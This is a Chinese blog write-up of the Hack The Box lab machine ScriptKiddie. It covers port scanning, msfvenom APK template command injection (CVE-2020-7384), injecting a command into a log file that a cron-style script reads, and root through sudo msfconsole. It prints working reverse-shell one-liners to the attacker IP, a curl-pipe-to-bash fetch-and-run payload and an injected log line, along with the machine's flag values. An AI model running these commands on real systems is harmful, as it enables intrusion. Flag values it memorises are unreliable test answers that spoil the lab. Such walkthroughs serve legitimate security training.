ScriptKiddie-htb-writeup

0x00 靶场技能介绍

章节技能:msfvenom-apk-模版注入、日志文件写shell、sudo-msfconsole-提权

参考链接:https://0xdf.gitlab.io/2021/06/05/htb-scriptkiddie.html

参考链接:https://medium.com/@joemcfarland/hack-the-box-scriptkiddie-writeup-af3a7634dc62

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.226

2、测试下连通率

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.10.226 -c 4     
PING 10.10.10.226 (10.10.10.226) 56(84) bytes of data.
64 bytes from 10.10.10.226: icmp_seq=2 ttl=63 time=283 ms
64 bytes from 10.10.10.226: icmp_seq=3 ttl=63 time=283 ms
64 bytes from 10.10.10.226: icmp_seq=4 ttl=63 time=281 ms

--- 10.10.10.226 ping statistics ---
4 packets transmitted, 3 received, 25% packet loss, time 3009ms
rtt min/avg/max/mdev = 280.706/282.376/283.415/1.192 ms

3、获取下开放端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.226 
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-24 09:36 CST
Nmap scan report for 10.10.10.226
Host is up (0.30s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
                                                                                         
┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ',' 
22,5000,                                                                                         
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,5000 -T4 --min-rate=5000 10.10.10.226
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-24 09:38 CST
Nmap scan report for 10.10.10.226
Host is up (0.28s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds

4、访问 5000端口发现是一个msf的辅助使用界面

5、通过尝试,发现 ping 功能和searchsploit功能,均无法执行命令

6、不过通过sploits 功能处,检索到 msfvenom 一个版本的漏洞信息

1
2
3
4
5
6
7
------------------------------------ ---------------------------------
 Exploit Title                      |  Path
------------------------------------ ---------------------------------
Metasploit Framework 6.0.11 - msfvenom APK template command injection | multiple/local/49491.py
------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

7、结合中间的 msfvenom的功能,这里可能存在漏洞

某些版本的 msfvenom 很容易通过 APK 模板进行命令注入。Script Kiddie 很友善地为我们提供了模板上传功能。

8、通过在本地kali机器上,下载该payload,并进行制作 apk 后门软件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m multiple/local/49491.py                     
  Exploit: Metasploit Framework 6.0.11 - msfvenom APK template command injection
      URL: https://www.exploit-db.com/exploits/49491
     Path: /usr/share/exploitdb/exploits/multiple/local/49491.py
    Codes: CVE-2020-7384
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/桌面/49491.py

┌──(kali㉿kali)-[~/桌面]
└─$ touch shell.sh  

┌──(kali㉿kali)-[~/桌面]
└─$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.2/443 0>&1

┌──(kali㉿kali)-[~/桌面]
└─$ vim 49491.py 

# Change me
payload = 'curl 10.10.14.2/shell.sh|bash'

┌──(kali㉿kali)-[~/桌面]
└─$ python3 49491.py  
[+] Manufacturing evil apkfile
Payload: curl 10.10.14.2/shell.sh|bash
-dname: CN='|echo Y3VybCAxMC4xMC4xNC4yL3NoZWxsLnNofGJhc2g= | base64 -d | sh #

  adding: empty (stored 0%)
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
正在为以下对象生成 2,048 位RSA密钥对和自签名证书 (SHA256withRSA) (有效期为 90 天):
         CN="'|echo Y3VybCAxMC4xMC4xNC4yL3NoZWxsLnNofGJhc2g= | base64 -d | sh #"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
jar 已签名。

警告: 
签名者证书为自签名证书。
为 -digestalg 选项指定的 SHA1 算法被视为存在安全风险而且被禁用。
为 -sigalg 选项指定的 SHA1withRSA 算法被视为存在安全风险而且被禁用。
检测到 POSIX 文件权限和/或 symlink 属性。这些属性在进行签名时会被忽略,不受该签名的保护。

[+] Done! apkfile is at /tmp/tmpba4cwkqa/evil.apk
Do: msfvenom -x /tmp/tmpba4cwkqa/evil.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null

9、可以看到 后门 apk 软件已经成功生成了

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/桌面]
└─$ ls -la /tmp/tmpba4cwkqa/
总计 16
drwx------  2 kali kali 4096 12月24日 09:59 .
drwxrwxrwt 19 root root 4096 12月24日 09:59 ..
-rw-r--r--  1 kali kali    0 12月24日 09:59 empty
-rw-r--r--  1 kali kali 2007 12月24日 09:59 evil.apk
-rw-r--r--  1 kali kali 2690 12月24日 09:59 signing.keystore

10、我们架设好本地服务,并上次该apk进行获取初始权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.226 - - [24/Dec/2023 10:03:31] "GET /shell.sh HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.226] 43882
bash: cannot set terminal process group (894): Inappropriate ioctl for device
bash: no job control in this shell
kid@scriptkiddie:~/html$ id
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
kid@scriptkiddie:~/html$

11、经过翻阅,我们成功获取到第一个flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
kid@scriptkiddie:~/html$ ls
ls
__pycache__
app.py
static
templates
kid@scriptkiddie:~/html$ ls -la /home/
ls -la /home/
total 16
drwxr-xr-x  4 root root 4096 Feb  3  2021 .
drwxr-xr-x 20 root root 4096 Feb  3  2021 ..
drwxr-xr-x 11 kid  kid  4096 Feb  3  2021 kid
drwxr-xr-x  6 pwn  pwn  4096 Feb  3  2021 pwn
kid@scriptkiddie:~/html$ ls -la /home/kid/
ls -la /home/kid/
total 60
drwxr-xr-x 11 kid  kid  4096 Feb  3  2021 .
drwxr-xr-x  4 root root 4096 Feb  3  2021 ..
lrwxrwxrwx  1 root kid     9 Jan  5  2021 .bash_history -> /dev/null
-rw-r--r--  1 kid  kid   220 Feb 25  2020 .bash_logout
-rw-r--r--  1 kid  kid  3771 Feb 25  2020 .bashrc
drwxrwxr-x  3 kid  kid  4096 Feb  3  2021 .bundle
drwx------  2 kid  kid  4096 Feb  3  2021 .cache
drwx------  4 kid  kid  4096 Feb  3  2021 .gnupg
drwxrwxr-x  3 kid  kid  4096 Feb  3  2021 .local
drwxr-xr-x  9 kid  kid  4096 Feb  3  2021 .msf4
-rw-r--r--  1 kid  kid   807 Feb 25  2020 .profile
drwx------  2 kid  kid  4096 Feb 10  2021 .ssh
-rw-r--r--  1 kid  kid     0 Jan  5  2021 .sudo_as_admin_successful
drwxrwxr-x  5 kid  kid  4096 Feb  3  2021 html
drwxrwxrwx  2 kid  kid  4096 Feb  3  2021 logs
drwxr-xr-x  3 kid  kid  4096 Feb  3  2021 snap
-r--------  1 kid  kid    33 Dec 24 01:35 user.txt
kid@scriptkiddie:~/html$ cat /home/kid/user.txt
cat /home/kid/user.txt
b5ff36031c788d02d4253281be9cc233

0x02 系统权限获取

12、通过查看sudo -l 发现,我们并没有当前权限

1
2
3
4
kid@scriptkiddie:~/html$ sudo -l
sudo -l
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
kid@scriptkiddie:~/html$

13、但是我们发现了还有一个 pwn 用户,且可以查看用户下的一个脚本信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
kid@scriptkiddie:~/html$ ls -la /home/pwn
ls -la /home/pwn
total 44
drwxr-xr-x 6 pwn  pwn  4096 Feb  3  2021 .
drwxr-xr-x 4 root root 4096 Feb  3  2021 ..
lrwxrwxrwx 1 root root    9 Feb  3  2021 .bash_history -> /dev/null
-rw-r--r-- 1 pwn  pwn   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 pwn  pwn  3771 Feb 25  2020 .bashrc
drwx------ 2 pwn  pwn  4096 Jan 28  2021 .cache
drwxrwxr-x 3 pwn  pwn  4096 Jan 28  2021 .local
-rw-r--r-- 1 pwn  pwn   807 Feb 25  2020 .profile
-rw-rw-r-- 1 pwn  pwn    74 Jan 28  2021 .selected_editor
drwx------ 2 pwn  pwn  4096 Feb 10  2021 .ssh
drwxrw---- 2 pwn  pwn  4096 Dec 24 02:00 recon
-rwxrwxr-- 1 pwn  pwn   250 Jan 28  2021 scanlosers.sh
kid@scriptkiddie:~/html$ cat /home/pwn/scanlosers.sh
cat /home/pwn/scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
kid@scriptkiddie:~/html$

14、通过查看演示报告,发现可以直接往 log 日志里写shell,且会被执行到,我们往日志文件里写个反弹shell

1
2
3
kid@scriptkiddie:~/html$ echo "x x x 127.0.0.1; bash -c 'bash -i >& /dev/tcp/10.10.14.2/10086 0>&1' # ."  > /home/kid/logs/hackers
<.10.14.2/10086 0>&1' # ."  > /home/kid/logs/hackers
kid@scriptkiddie:~/html$

15、至此成功监听获取到pwn权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.226] 57008
bash: cannot set terminal process group (868): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
pwn@scriptkiddie:~$

16、这里发现,我们可以root权限运营msf,那就直接提权完事

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
sudo /opt/metasploit-framework-6.0.9/msfconsole
                                                  

         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before


       =[ metasploit v6.0.9-dev                           ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Save the current environment with the save command, future console restarts will use this environment again

stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > irb
stty: 'standard input': Inappropriate ioctl for device
[*] Starting IRB shell...
[*] You are in the "framework" object

system("/bin/bash")
Switch to inspect mode.
irb: warn: can't alias jobs from irb_jobs.
>> 
>> system("/bin/bash")
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
e87e72d245999bb267a776496513cf29

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/314

打靶记
#shooting-range
ScriptKiddie-htb-writeup
https://sh1yan.top/2023/12/23/ScriptKiddie-htb-writeup/
作者
shiyan
发布于
2023年12月23日
许可协议